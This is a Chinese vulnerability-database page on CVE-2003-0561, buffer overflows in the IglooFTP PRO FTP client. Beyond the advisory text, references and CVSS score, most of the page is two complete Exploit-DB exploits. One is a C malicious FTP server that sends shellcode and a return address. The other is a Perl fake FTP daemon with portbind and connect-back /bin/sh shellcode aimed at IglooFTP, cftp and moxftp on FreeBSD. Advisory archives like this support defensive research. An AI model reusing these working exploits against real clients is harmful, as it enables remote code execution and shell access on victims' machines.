CVE-2003-0561
CVSS7.5
发布时间 :2003-08-18 00:00:00
修订时间 :2016-10-17 22:35:23
NMCOE    

[原文]Multiple buffer overflows in IglooFTP PRO 3.8 allow remote FTP servers to execute arbitrary code via (1) a long FTP banner, or long responses to the client commands (2) USER, (3) PASS, (4) ACCT, and possibly other commands.


[CNNVD]IglooFTP PRO缓冲区溢出漏洞(CNNVD-200308-081)

        IglooFTP PRO 3.8版本存在多个缓冲区溢出漏洞。远程FTP服务器可以借助(1)超长FTP标语,或到客户端命令(2)USER、(3)PASS、(4)ACCT和可能其他命令的超长响应来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0561
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0561
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-081
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0010.html
(UNKNOWN)  VULNWATCH  20030707 Multiple Buffer Overflows in IglooFTP PRO
http://marc.info/?l=bugtraq&m=105769805311484&w=2
(UNKNOWN)  BUGTRAQ  20030707 Multiple Buffer Overflows in IglooFTP PRO

- 漏洞信息

IglooFTP PRO缓冲区溢出漏洞
高危 缓冲区溢出
2003-08-18 00:00:00 2005-10-20 00:00:00
远程  
        IglooFTP PRO 3.8版本存在多个缓冲区溢出漏洞。远程FTP服务器可以借助(1)超长FTP标语,或到客户端命令(2)USER、(3)PASS、(4)ACCT和可能其他命令的超长响应来执行任意代码。

- 公告与补丁

        

- 漏洞信息 (22871)

IglooFTP PRO 3.8 Multiple Buffer Overflow Vulnerabilities (1) (EDBID:22871)
windows remote
2003-07-07 Verified
0 vkhoshain
N/A [点击下载]
source: http://www.securityfocus.com/bid/8117/info

IglooFTP PRO for Windows platforms has been reported prone to multiple buffer overrun vulnerabilities.

The issue likely presents itself due do a lack of sufficient bounds checking performed on data that is copied into a reserved internal memory buffer. Remote arbitrary code execution has been confirmed.

It should be noted that although this vulnerability has been reported to affect IglooFTP PRO version 3.8, other versions might also be affected.

/* IglooExploit.c (Windows XP Professional Build 2600.x)
*
* vkhoshain@hotmail.com
* ---------------------------
* glooFTP Pro 3.8 Remote exploit code is ready to use ;)
* all you need to do is compile the source code and then
* run the program and wait for glooFTP Pro 3.8 connection
*
* This one doesn't do anything , just run notepad.exe and then crash
* the program by :
* INT 3 ;)
*
*/  

#include "winsock2.h"
#include "stdio.h"
#pragma comment (lib,"ws2_32")

int main()
{

        char spend[1024];
        char shellcode[] =
        "\x90\x90\x90\x90\x90\xEB\x13\x5F\x66\x31\xC0\x88\x47"
                                        "\x0E\x40\x50\x57\xB8\xC6\x84\xE6\x77\xFF\xD0\xCD\x03"
                                    "\xE8\xE8\xFF\xFF\xFF\x6E\x6F\x74\x65\x70\x61\x64\x20"    
                                                "\x20\x20\x20\x20\x20\x20\x23";           
        WSADATA wsaData;                                                       
        int s1,spt;
        struct sockaddr_in p;
        struct sockaddr_in emp;
        int len;
// Startup ...
        WSAStartup(0x0101,&wsaData);


// Creating first socket!
printf("Creating socket ...\n");
        if ((s1=socket(AF_INET,SOCK_STREAM,0))==-1){
                printf("Err in Creating socket\n");
                closesocket(s1);
                return 0;
        }
        p.sin_port = htons(21);
        p.sin_family =AF_INET; 
        p.sin_addr.s_addr = INADDR_ANY;



// Binding ---
printf("Binding ...\n");
        if ((bind(s1,(struct sockaddr*) &p,sizeof(p)))==-1)
        {
                printf("Err in Bind ...\n");
                closesocket(s1);
                return 0;
        }

printf("going to start listening\n");
if ((listen(s1,5))==-1)
{
        printf("Err in liten method ..\n");
        closesocket(s1);
        return 0;
}

len=sizeof(emp);

// ACCEPTING
printf("Listening on port 21 , please wait for glooFTP(ver3.8) connection
...\n");
spt=accept(s1,&emp,&len);
printf("The ftp client has just connected ,please wait ...\n");

send(spt,"200 ",4,0);                      // Sending "200 "


send(spt,spend,1024,0);                         //to recive RET addr place


send(spt,"\x79\xfc\xe9\x77",4,0);         //EIP Address (RET Addr)


send(spt,shellcode,46,0);                 //Sending Shellcode

send(spt,"\n",1,0);

closesocket(s1);
closesocket(spt);
printf("Shellcode has just sent , Done.\n");

return 0;

}		

- 漏洞信息 (22872)

IglooFTP PRO 3.8 Multiple Buffer Overflow Vulnerabilities (2) (EDBID:22872)
windows remote
2003-07-07 Verified
0 Peter Winter-Smith
N/A [点击下载]
source: http://www.securityfocus.com/bid/8117/info
 
IglooFTP PRO for Windows platforms has been reported prone to multiple buffer overrun vulnerabilities.
 
The issue likely presents itself due do a lack of sufficient bounds checking performed on data that is copied into a reserved internal memory buffer. Remote arbitrary code execution has been confirmed.
 
It should be noted that although this vulnerability has been reported to affect IglooFTP PRO version 3.8, other versions might also be affected.


http://www.exploit-db.com/sploits/22872.zip		

- 漏洞信息 (22891)

IglooFTP 0.6.1 Banner Parsing Buffer Overflow Vulnerability (EDBID:22891)
freebsd remote
2003-07-10 Verified
0 inv[at]dtors
N/A [点击下载]
source: http://www.securityfocus.com/bid/8161/info

A buffer overflow vulnerability has been reported in IglooFTP. The vulnerability occurs when IglooFTP is parsing 'Welcome' banner messages from remote FTP servers. When IglooFTP receives an FTP banner exceeding a certain length, it will trigger the overflow condition. This could allow for execution of malicious code in the context of the FTP client.

#!/usr/bin/perl

# PoC exploit for iglooftp, cftp and moxftp for freebsd

# moxftp / mftp 2.2
# cftp 0.12
# Iglooftp 0.6.1

# Some of the code is fucked, the passive connection is a cheap hack and will not
# respawn, so the fake ftpd will have to be restarted... (only IglooFTP)
# Some RET adr's change, this can be fixed with gdb, look into it yourself..

# all the clients are from ports.. some may have been fixed, did this shit some 
# time ago..

# thanks to kokanin for help and advice
# code by inv[at]dtors

use IO::Socket;

sub convert_ret {
my($ret) = @_;
    
    for ($x=8; $x>0; $x=$x-2){
	$ret = substr($ret_temp,$x,2);
	$new_ret .= chr hex "$ret";
    }
return $new_ret;
}

sub convert_ip {
my($ip) = @_;

@ip_tmp = split(/\./, $ip);

for($x=0; $x<4; $x++) {
    $new_ip .= chr @ip_tmp[$x];
}
return $new_ip;
}

$server_port = 21;
$passive_server_port = 10324;

unless(@ARGV == 3 || @ARGV == 2) 
{ die 
"Usage ./DSR-ftp_clients.pl Shellcode Client Ip\n
\tShellcode:\t0 = Portbind
\t\t\t1 = Connect back\n
\tClient:\t\t0 = IglooFTP (FreeBSD 4.7)
\t\t\t1 = cftp (FreeBSD 4.7)
\t\t\t2 = Moxftp (FreeBSD 4.7)
\t\t\t3 = cftp (FreeBSD 5.0)
\t\t\t4 = IglooFTP (FreeBSD 5.0)
\t\t\t5 = Moxftp (FreeBSD 5.0)\n"
}

($shellcode_arg, $client_arg, $extra_arg) = @ARGV;

$user_ip = convert_ip($extra_arg);

@shellcode_list = (
    "Portbind,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80",
    "Connect Back,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68"."$user_ip"."\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80");

@client_list = (
    "IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
    "cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
    "mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
    "cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
    "IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
    "mftp - FreeBSD 5.0,532,0xbfbff950,1,100");

@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);

print "\tDSR-ftp_clients by inv\n
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]\n";

$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);

$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "\x90"x$nop_count;

$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;

if(@client_info[3] eq "1") {
    $nops_x = "\x90"x@client_info[1];
    $nops_y = "\x90"x@client_info[4];
    $exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}

if($client_arg == 0 or $client_arg == 4) {
	$exploit_string ="total 666
drwxr-xr-x	25 root wheel	1536 Jan 28 00:13 .
drwxr-xr-x	14 root wheel	 512 Jan 28 00:13 ..
-rwxr-xr-x	 2 inv	inv	 512 Jan 29 01:00 $nops$shellcode$ret";
}

$server = IO::Socket::INET->new(LocalPort => $server_port,
                                Type    => SOCK_STREAM,
                                Reuse   => 1,
                                Listen  => 10)
or die "Can't listen on $server_port : $!\n";

while ($client = $server->accept()) {
    
    if(@client_info[3] == 1) {
	print $client "220 $exploit_string\n";
    }
    
    if(@client_info[3] eq "0") {
	print $client "220 0xdeadcode\n";
	while($request !=~ /QUIT/i) {
	    $request = <$client>;
	    print $request;
	    
	    if($request =~ /PASS/i) {
		print $client "230 User anonymous logged in.\n";
	    }
	    
	    if($request =~ /USER/i) {
		print $client "331 Password required for anonymous.\n";
	    }
	
	    if($request =~ /SYST/i) {
		print $client "215 UNIX Type: L8\n";
	    }
	
	    if($request =~ /REST/i) {
		print $client "350 Restarting.\n";
	    }
	
	    if($request =~ /TYPE/i) {
		    print $client "200 Type set to A.\n";
	    }
	    
	    if($request =~ /PWD/i or $request =~ /FEAT/i) {
		print $client "257 \"/usr/home/inv/\" is current directory.\n";
	    }
	
	    if($request =~ /PASV/i) {
		$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
					Type 	=> SOCK_STREAM,
					Reuse 	=> 1,
					Listen 	=> 10)
		or die "Can't open passive port";
		print $client "227 Entering Passive Mode (127,0,0,1,40,84)\n";
	    }
	    
	    if ($request =~ /LIST/i) {
		while($passive_client = $passive_server->accept()){
		    print $client "150 Starting transfer.\n";    
		    print $passive_client $exploit_string;
		    close $passive_client;
		    print $client "226 BANG YOU ARE DEAD!!!\n";
		}
	    }	
	
	}
    close $client;
    }
}		

- 漏洞信息

10327
IglooFTP PRO Multiple Client Command Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-07-06 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站